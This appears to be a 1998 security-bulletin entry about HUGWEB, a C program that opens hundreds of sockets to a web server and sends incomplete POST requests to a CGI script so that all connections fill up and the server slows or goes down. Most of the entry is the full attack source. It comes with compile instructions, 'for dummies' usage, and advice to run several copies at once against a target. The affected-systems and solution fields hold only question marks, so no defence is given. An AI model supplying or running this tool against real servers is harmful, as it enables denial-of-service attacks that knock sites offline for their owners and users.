COMMAND

    httpd

SYSTEMS AFFECTED

    ???

PROBLEM

    ET LoWNOISE found following.   What program below does is  to fill
    all the posible connections to  a web server.  Sometimes  bringing
    down (or slowing down) the server to the floor. All you need is  a
    good server to run this program and a nice target with a CGI  with
    POST Method. (You can use any CGI just check that uses POST).

    TO DUMMIES: Take the source code  of the html page where the  form
    is   it.      check   it,    and   look    for   something    like
    <host>/cgi-bin/<name_of_cgi> (there are some default cgi WITH POST
    METHOD).  Now:

	Hugweb <host> /cgi-bin/<name_of_cgi> &

    Sometimes depending on  how fast is  your server and  conection or
    the target server speed  u will have to  run the proggy 3  or more
    times in background.  Exploit follows:

    /* HUGWEB
       ET [Lownoise] - Colombia 1998.
       Copyshit (:Q~) ET 1998.

	ET <et@cyberspace.org>
	LowNoise <lownoise@cyberspace.org>

       Why is necesary a disclaimer when nobody reads it?.

       Compile for dummies
       ===================
	      gcc -o hugweb hugweb.c -lsocket -lnsl
    */

    #include <stdio.h>
    #include <string.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>



    char destino[99],
	 cgi[50];

    char linea1[100];  /* POST Call (JUST A HUG)*/

    int codigo,x,i,
	a,b,c,d;

    int sock[1000];
    int numsock = 400;  /* BE CAREFULL WITH THIS NUMBER (NUMBER OF SOCKETS OPEN AT THE SAME TIME)*/

    struct sockaddr_in sock_dest;
    char host_dest[100];

    char enter[2];

    main(int argc,char *argv[])
    {
       struct hostent *target;

       enter[0]='\n';
       enter[1]='\0';

       if(argc < 2){
	 fprintf(stdout,"Usage: %s <target> </dir/cgi> \n",argv[0]);
	 exit(0);
       }

       strcpy(destino,argv[1]);
       strcpy(cgi,argv[2]);

       if (sscanf(destino,"%d.%d.%d.%d",&a,&b,&c,&d) != 4) {
	  target = gethostbyname(destino);
	  if (target == NULL) {
	     fprintf(stdout,"Ahhhhhhh! cannot resolve host %s\n",destino);
	     exit(0);
	  }
	  sprintf(host_dest,"%d.%d.%d.%d",(unsigned char ) target->h_addr_list[0][0],
					  (unsigned char ) target->h_addr_list[0][1],
					  (unsigned char ) target->h_addr_list[0][2],
					  (unsigned char ) target->h_addr_list[0][3]);
       }
       else {
	  strncpy(host_dest,destino,99);
       }
       fprintf(stdout,"[HUGWeb] Attacking : %s\n",host_dest);

       sock_dest.sin_family = AF_INET;
       sock_dest.sin_port = htons(80);                         /* www port */
       sock_dest.sin_addr.s_addr = inet_addr(host_dest);

       codigo=0;
       while(codigo <= 99999){

	  i=0;
	  while(i<numsock){
		 sock[i] = socket(AF_INET,SOCK_STREAM,0);
		 if(sock[i] < 0) {
		   fprintf(stdout,"ERROR: socket() failed\n");
		   exit(0);
		 }

		 x = connect(sock[i],(struct sockaddr *) &sock_dest,sizeof(sock_dest));
		 if(x < 0){
		   fprintf(stdout,"Ooooooppppppps ... Can't connect to web server ~:cD\n");
		   exit(0);
	       }
	       i++;
	   }

		 /* HUG */
		 strcpy(linea1,"POST ");
		 strcat(linea1,cgi);
	       strcat(linea1," HTTP/1.0");
	       strcat(linea1,enter);

	       //fprintf(stdout,".");
	    i=0;
	  while(i<numsock){
		 send(sock[i],linea1,strlen(linea1)*sizeof(char),0);
		 //bzero(linea1,strlen(linea1));
		 i++;
	  }

	  i=0;
	  while(i<numsock){
	       close(sock[i]);
	  }
	    codigo++;
       }
       fprintf(stdout,"\nThe END. ET@cyberspace.org Lownoise 1998\n");
    }

SOLUTION

    ???